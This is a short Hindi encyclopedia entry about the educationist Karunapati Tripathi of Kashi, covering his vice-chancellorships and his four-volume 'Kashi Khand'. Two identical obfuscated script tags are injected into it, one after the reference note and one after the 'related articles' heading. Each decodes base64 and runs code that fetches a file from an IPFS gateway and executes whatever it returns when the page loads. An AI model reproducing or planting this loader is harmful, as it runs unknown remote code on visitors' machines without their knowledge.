करुणापति त्रिपाठी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

करुणापति त्रिपाठी काशी (वर्तमान बनारस), उत्तर प्रदेश के सारस्वत विभूति पण्डित नारायण त्रिपाठी के पाँचवे पुत्र थे। ये मूल रूप से शिक्षा शास्त्री के रूप में जाने जाते थे।[1]

  • 'काशी हिन्दू विश्वविद्यालय' तथा 'संस्कृत विश्वविद्यालय' के कुलपति पद को करुणापति त्रिपाठी ने सुशोभित किया था।
  • इनकी 'काशी खण्ड' नामक पुस्तक चार भागों में प्रकाशित हुई थी, जो इनकी संपादन कला का परिचायक है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. काशी के साहित्यकार (हिन्दी)। । अभिगमन तिथि: 13 जनवरी, 2014।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>